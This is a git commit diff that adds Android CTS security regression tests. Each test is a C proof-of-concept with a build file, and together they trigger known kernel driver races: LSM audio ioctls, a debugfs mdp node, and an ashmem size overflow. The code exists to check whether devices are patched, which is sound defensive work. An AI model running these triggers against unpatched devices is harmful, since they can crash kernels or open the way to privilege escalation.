Merge "Merge "Add NativeClearKeySystemTest." into nougat-cts-dev am: f96407bf8c" into nougat-mr1-cts-dev am: c556b8adeb am: 87565ff346
am: 3b41d6bf0a -s ours
Change-Id: If54a1e4db0b3a55d2a35d9885464b3831eae2fe5
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index cd68c69..7d2025d 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -44,6 +44,66 @@
<option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
<option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
<option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
+ <option name="push" value="Bug-34328139->/data/local/tmp/Bug-34328139" />
+ <option name="push" value="Bug-33452365->/data/local/tmp/Bug-33452365" />
+ <option name="push" value="CVE-2017-0451->/data/local/tmp/CVE-2017-0451" />
+ <option name="push" value="CVE-2017-0580->/data/local/tmp/CVE-2017-0580" />
+ <option name="push" value="CVE-2017-0462->/data/local/tmp/CVE-2017-0462" />
+ <option name="push" value="CVE-2017-0579->/data/local/tmp/CVE-2017-0579" />
+ <option name="push" value="CVE-2017-0577->/data/local/tmp/CVE-2017-0577" />
+ <option name="push" value="CVE-2016-10231->/data/local/tmp/CVE-2016-10231" />
+ <option name="push" value="CVE-2017-0564->/data/local/tmp/CVE-2017-0564" />
+ <option name="push" value="CVE-2017-7369->/data/local/tmp/CVE-2017-7369" />
+ <option name="push" value="CVE-2017-0576->/data/local/tmp/CVE-2017-0576" />
+ <option name="push" value="CVE-2017-0586->/data/local/tmp/CVE-2017-0586" />
+ <option name="push" value="CVE-2017-0705->/data/local/tmp/CVE-2017-0705" />
+ <option name="push" value="CVE-2017-8263->/data/local/tmp/CVE-2017-8263" />
+ <!--__________________-->
+ <!-- Bulletin 2017-01 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2017-02 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2017-03 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2017-04 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2017-05 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2017-06 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <option name="push" value="Bug-35047780->/data/local/tmp/Bug-35047780" />
+ <option name="push" value="Bug-35047217->/data/local/tmp/Bug-35047217" />
+ <option name="push" value="Bug-35048450->/data/local/tmp/Bug-35048450" />
+ <option name="push" value="Bug-35644815->/data/local/tmp/Bug-35644815" />
+
+ <!--__________________-->
+ <!-- Bulletin 2017-07 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <option name="push" value="Bug-33863407->/data/local/tmp/Bug-33863407" />
+ <option name="push" value="Bug-34173755->/data/local/tmp/Bug-34173755" />
+ <option name="push" value="Bug-35950388->/data/local/tmp/Bug-35950388" />
+
+ <!--__________________-->
+ <!-- Bulletin 2017-08 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <option name="push" value="Bug-36266767->/data/local/tmp/Bug-36266767" />
+ <option name="push" value="Bug-36591162->/data/local/tmp/Bug-36591162" />
+ <option name="push" value="CVE-2017-9678->/data/local/tmp/CVE-2017-9678" />
+ <option name="push" value="CVE-2017-9692->/data/local/tmp/CVE-2017-9692" />
+
<option name="append-bitness" value="true" />
</target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
diff --git a/hostsidetests/security/securityPatch/Bug-33452365/Android.mk b/hostsidetests/security/securityPatch/Bug-33452365/Android.mk
new file mode 100644
index 0000000..5178058
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-33452365/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-33452365
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-33452365/poc.c b/hostsidetests/security/securityPatch/Bug-33452365/poc.c
new file mode 100644
index 0000000..e6755a9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-33452365/poc.c
@@ -0,0 +1,225 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <string.h>
+#include <time.h>
+
+#define THREAD_NUM 600
+#define DEV "/dev/snd/pcmC0D16c"
+
+typedef _Bool bool;
+
+enum lsm_app_id {
+ LSM_VOICE_WAKEUP_APP_ID = 1,
+ LSM_VOICE_WAKEUP_APP_ID_V2 = 2,
+};
+
+enum lsm_detection_mode {
+ LSM_MODE_KEYWORD_ONLY_DETECTION = 1,
+ LSM_MODE_USER_KEYWORD_DETECTION
+};
+
+enum lsm_vw_status {
+ LSM_VOICE_WAKEUP_STATUS_RUNNING = 1,
+ LSM_VOICE_WAKEUP_STATUS_DETECTED,
+ LSM_VOICE_WAKEUP_STATUS_END_SPEECH,
+ LSM_VOICE_WAKEUP_STATUS_REJECTED
+};
+
+enum LSM_PARAM_TYPE {
+ LSM_ENDPOINT_DETECT_THRESHOLD = 0,
+ LSM_OPERATION_MODE,
+ LSM_GAIN,
+ LSM_MIN_CONFIDENCE_LEVELS,
+ LSM_REG_SND_MODEL,
+ LSM_DEREG_SND_MODEL,
+ LSM_CUSTOM_PARAMS,
+ LSM_PARAMS_MAX,
+};
+
+struct snd_lsm_ep_det_thres {
+ __u32 epd_begin;
+ __u32 epd_end;
+};
+
+struct snd_lsm_detect_mode {
+ enum lsm_detection_mode mode;
+ bool detect_failure;
+};
+
+struct snd_lsm_gain {
+ __u16 gain;
+};
+
+struct snd_lsm_sound_model_v2 {
+ __u8 __user *data;
+ __u8 *confidence_level;
+ __u32 data_size;
+ enum lsm_detection_mode detection_mode;
+ __u8 num_confidence_levels;
+ bool detect_failure;
+};
+
+struct snd_lsm_session_data {
+ enum lsm_app_id app_id;
+};
+
+struct snd_lsm_event_status {
+ __u16 status;
+ __u16 payload_size;
+ __u8 payload[0];
+};
+
+struct snd_lsm_detection_params {
+ __u8 *conf_level;
+ enum lsm_detection_mode detect_mode;
+ __u8 num_confidence_levels;
+ bool detect_failure;
+};
+
+struct lsm_params_info {
+ __u32 module_id;
+ __u32 param_id;
+ __u32 param_size;
+ __u8 __user *param_data;
+ enum LSM_PARAM_TYPE param_type;
+};
+
+struct snd_lsm_module_params {
+ __u8 __user *params;
+ __u32 num_params;
+ __u32 data_size;
+};
+
+struct snd_lsm_output_format_cfg {
+ __u8 format;
+ __u8 packing;
+ __u8 events;
+ __u8 mode;
+};
+
+#define SNDRV_LSM_DEREG_SND_MODEL _IOW('U', 0x01, int)
+#define SNDRV_LSM_EVENT_STATUS _IOW('U', 0x02, struct snd_lsm_event_status)
+#define SNDRV_LSM_ABORT_EVENT _IOW('U', 0x03, int)
+#define SNDRV_LSM_START _IOW('U', 0x04, int)
+#define SNDRV_LSM_STOP _IOW('U', 0x05, int)
+#define SNDRV_LSM_SET_SESSION_DATA _IOW('U', 0x06, struct snd_lsm_session_data)
+#define SNDRV_LSM_REG_SND_MODEL_V2 _IOW('U', 0x07,\
+ struct snd_lsm_sound_model_v2)
+#define SNDRV_LSM_LAB_CONTROL _IOW('U', 0x08, uint32_t)
+#define SNDRV_LSM_STOP_LAB _IO('U', 0x09)
+#define SNDRV_LSM_SET_PARAMS _IOW('U', 0x0A, \
+ struct snd_lsm_detection_params)
+#define SNDRV_LSM_SET_MODULE_PARAMS _IOW('U', 0x0B, \
+ struct snd_lsm_module_params)
+
+int fd;
+pthread_t thread_id[THREAD_NUM+1] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int attack = 0;
+
+struct snd_lsm_sound_model_v2 snd_model_v2_1 = {0, 0, 0, 0, 0, 0};
+struct snd_lsm_sound_model_v2 snd_model_v2_2 = {0, 0, 0, 0, 0, 0};
+struct snd_lsm_detection_params snd_params = {0, 0, 0, 0};
+unsigned char snd_data[1024] = "abcdefghigklmnjfsljffsljflwjwfhnsdnfsnfsnfsnflnflsfls";
+unsigned char confidence_level_1[4] = "123";
+unsigned char confidence_level_2[20] = "12345678";
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+
+ return ret;
+}
+
+void* child_ioctl_0()
+{
+ set_affinity(1);
+ snd_model_v2_1.data = snd_data;
+ snd_model_v2_1.data_size = sizeof(snd_data);
+ snd_model_v2_1.confidence_level = confidence_level_1;
+ snd_model_v2_1.num_confidence_levels = strlen((const char *)confidence_level_1);
+ snd_model_v2_1.detection_mode = LSM_MODE_USER_KEYWORD_DETECTION;
+ snd_model_v2_1.detect_failure = 1;
+
+ while(1){
+ ioctl(fd, SNDRV_LSM_REG_SND_MODEL_V2, &snd_model_v2_1);
+ }
+}
+
+void* child_ioctl_1()
+{
+ set_affinity(2);
+ snd_model_v2_2.data = snd_data;
+ snd_model_v2_2.data_size = sizeof(snd_data);
+ snd_model_v2_2.confidence_level = confidence_level_2;
+ snd_model_v2_2.num_confidence_levels = strlen((const char *)confidence_level_2);
+ snd_model_v2_2.detection_mode = LSM_MODE_USER_KEYWORD_DETECTION;
+ snd_model_v2_2.detect_failure = 1;
+
+ snd_params.num_confidence_levels = 20;
+ snd_params.conf_level = confidence_level_2;
+ snd_params.detect_failure = 1;
+ snd_params.detect_mode = LSM_MODE_USER_KEYWORD_DETECTION;
+
+ while(1){
+ nanosleep((const struct timespec[]){{0, 100000}}, NULL);
+ ioctl(fd, SNDRV_LSM_SET_PARAMS, &snd_params);
+ }
+}
+
+int main()
+{
+ int i, ret;
+
+ set_affinity(0);
+
+ fd = open(DEV,O_RDWR);
+ if(fd == -1){
+ return -1;
+ }
+
+ ret = ioctl(fd, SNDRV_LSM_START, 0);
+ if(ret)
+ return -1;
+
+ for(i = 0; i < 300; i = i + 2){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child_ioctl_0, NULL);
+ thread_ret[i+1] = pthread_create(thread_id + i +1, NULL, child_ioctl_1, NULL);
+ }
+
+ i = 0;
+ attack = 1;
+ while(100){
+ nanosleep((const struct timespec[]){{0, 100000}}, NULL);
+ }
+ attack = 0;
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/Bug-33863407/Android.mk b/hostsidetests/security/securityPatch/Bug-33863407/Android.mk
new file mode 100644
index 0000000..f1c32e1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-33863407/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-33863407
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-33863407/poc.c b/hostsidetests/security/securityPatch/Bug-33863407/poc.c
new file mode 100644
index 0000000..5b2c95e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-33863407/poc.c
@@ -0,0 +1,93 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <asm/ioctl.h>
+#include <pthread.h>
+
+#define DEBUG
+#ifdef DEBUG
+#define LOG(fmt, ...) do { \
+ printf("%s:%d: "fmt "\n", __FUNCTION__, \
+ __LINE__, ##__VA_ARGS__); \
+} while (0)
+#else
+#define LOG(fmt, ...)
+#endif
+
+char *infopath = "/sys/kernel/debug/mdp/reg";
+int fd1 = -1;
+int fd2 = -1;
+
+#define SIZE 2048
+
+void Thread1(void)
+{
+ int ret;
+ char buf[SIZE] = {0};
+ fd1 = open(infopath, O_RDWR);
+ while (1) {
+ ret = read(fd1, buf, SIZE);
+ sleep(0.1);
+ }
+ close(fd1);
+}
+
+void Thread2(void)
+{
+ int i;
+ while(1) {
+ fd2 = open(infopath, O_RDWR);
+ if(fd2 > 0)
+ {
+ close(fd2);
+ fd2 = -1;
+ }
+ sleep(0.1);
+ }
+}
+
+void trigger()
+{
+ int i, ret;
+ pthread_t tid_a;
+ pthread_t tid_b;
+
+ ret = pthread_create((pthread_t *) &tid_a, NULL, (void *) Thread1, NULL);
+ ret = pthread_create((pthread_t *) &tid_b, NULL, (void *) Thread2, NULL);
+
+ i = 200;
+ do {
+ sleep(1);
+ } while(i-- > 0);
+
+ pthread_join(tid_a, NULL);
+ pthread_join(tid_b, NULL);
+}
+
+int main()
+{
+ trigger();
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/Bug-34173755/Android.mk b/hostsidetests/security/securityPatch/Bug-34173755/Android.mk
new file mode 100644
index 0000000..f07cf4e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34173755/Android.mk
@@ -0,0 +1,35 @@
+#Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+ include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-34173755
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-34173755/local_poc.h b/hostsidetests/security/securityPatch/Bug-34173755/local_poc.h
new file mode 100644
index 0000000..d2508dd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34173755/local_poc.h
@@ -0,0 +1,81 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef __CMD_H__
+#define __CMD_H__
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+/*
+ * Let any architecture override either of the following before
+ * including this file.
+ */
+
+#ifndef _IOC_SIZEBITS
+# define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+# define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS)-1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS)-1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT+_IOC_SIZEBITS)
+
+/*
+ * Direction bits, which any architecture can choose to override
+ * before including this file.
+ */
+
+#ifndef _IOC_NONE
+# define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+# define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+# define _IOC_READ 2U
+#endif
+
+
+
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#define _IOC(dir,type,nr,size) \
+ (((dir) << _IOC_DIRSHIFT) | \
+ ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | \
+ ((size) << _IOC_SIZESHIFT))
+
+
+
+/* used to create numbers */
+#define _IO(type,nr) _IOC(_IOC_NONE,(type),(nr),0)
+#define _IOR(type,nr,size) _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOW(type,nr,size) _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+
+#endif
+
diff --git a/hostsidetests/security/securityPatch/Bug-34173755/poc.c b/hostsidetests/security/securityPatch/Bug-34173755/poc.c
new file mode 100644
index 0000000..6ec4efd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34173755/poc.c
@@ -0,0 +1,155 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/ashmem.h>
+#include <pthread.h>
+#include <sched.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include "local_poc.h"
+
+#define ASHMEM_CACHE_CLEAN_RANGE _IO(__ASHMEMIOC, 12)
+#define ASHMEM_CACHE_FLUSH_RANGE _IO(__ASHMEMIOC, 11)
+#define ASHMEM_CACHE_INV_RANGE _IO(__ASHMEMIOC, 13)
+
+int fd;
+void *addr;
+pthread_barrier_t barr;
+
+int thread_mmap_status = 0;
+int thread_set_size_status = 0;
+
+void *thread_mmap(void *);
+void *thread_set_size(void *);
+
+#define ORI_SIZE 4096 * 10
+
+#define OVERFLOW_SIZE 0xFFFFFFFFFFFFFFFF - ORI_SIZE
+
+int main(int argc, char **argv) {
+ int ret;
+ int i;
+ pthread_t tid[2];
+ struct stat st;
+ const char *name = "_crash";
+ struct ashmem_pin pin;
+ char *buf;
+ int size;
+ void *map_again;
+ void *map_buf[100];
+ pid_t pid;
+
+ for (i = 0; i < 10; i++) {
+ map_buf[i] =
+ mmap(NULL, 4096 * 100, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_ANON | MAP_GROWSDOWN, -1, 0);
+ memset((char *)map_buf[i], 0x0, 4096 * 99);
+ }
+
+ while (1) {
+ pthread_barrier_init(&barr, NULL, 2);
+ thread_mmap_status = 0;
+ thread_set_size_status = 0;
+
+ fd = open("/dev/ashmem", O_RDWR);
+ if (fd < 0) {
+ return 0;
+ }
+
+ ret = ioctl(fd, ASHMEM_SET_SIZE, ORI_SIZE);
+ if (ret < 0) {
+ if (addr != MAP_FAILED) munmap(addr, ORI_SIZE);
+ close(fd);
+ continue;
+ }
+
+ ret = pthread_create(&tid[0], NULL, thread_mmap, NULL);
+ if (ret != 0) {
+ if (addr != MAP_FAILED) munmap(addr, ORI_SIZE);
+ close(fd);
+ return -1;
+ }
+
+ ret = pthread_create(&tid[1], NULL, thread_set_size, NULL);
+ if (ret != 0) {
+ if (addr != MAP_FAILED) munmap(addr, ORI_SIZE);
+ close(fd);
+ return -1;
+ }
+
+ pthread_join(tid[0], NULL);
+ pthread_join(tid[1], NULL);
+
+ errno = 0;
+ size = ioctl(fd, ASHMEM_GET_SIZE, 0);
+ if (size == (unsigned int)OVERFLOW_SIZE && addr != MAP_FAILED) break;
+ }
+
+ map_again = mmap(NULL, ORI_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_NORESERVE, fd, 0);
+
+ munmap(addr, ORI_SIZE);
+
+ for (i = 0; i < 10; i++) {
+ munmap(map_buf[i], 4096 * 100);
+ }
+
+ pid = fork();
+ if (pid == 0) {
+ for (i = 0; i < 1000; i++)
+ mmap(NULL, 4096 * 100, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_ANON | MAP_GROWSDOWN, -1, 0);
+ memset((char *)map_buf[i], 0x0, 4096 * 99);
+
+ return 0;
+ }
+ sleep(4);
+
+ ret = ioctl(fd, ASHMEM_CACHE_CLEAN_RANGE, 0);
+
+ ret = ioctl(fd, ASHMEM_CACHE_FLUSH_RANGE, 0);
+ ret = ioctl(fd, ASHMEM_CACHE_INV_RANGE, 0);
+ munmap(map_again, ORI_SIZE);
+ close(fd);
+
+ return 0;
+}
+
+void *thread_mmap(void *arg) {
+ pthread_barrier_wait(&barr);
+ addr = mmap(NULL, ORI_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_NORESERVE, fd, 0);
+
+ return NULL;
+}
+
+void *thread_set_size(void *arg) {
+ pthread_barrier_wait(&barr);
+ ioctl(fd, ASHMEM_SET_SIZE, OVERFLOW_SIZE);
+
+ return NULL;
+}
diff --git a/hostsidetests/security/securityPatch/Bug-34328139/Android.mk b/hostsidetests/security/securityPatch/Bug-34328139/Android.mk
new file mode 100644
index 0000000..cd8d541
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34328139/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-34328139
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-34328139/local_poc.h b/hostsidetests/security/securityPatch/Bug-34328139/local_poc.h
new file mode 100644
index 0000000..c14a36b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34328139/local_poc.h
@@ -0,0 +1,98 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __CMD_H__
+#define __CMD_H__
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+#ifndef _IOC_SIZEBITS
+# define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+# define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS)-1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS)-1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT+_IOC_SIZEBITS)
+
+#ifndef _IOC_NONE
+# define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+# define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+# define _IOC_READ 2U
+#endif
+
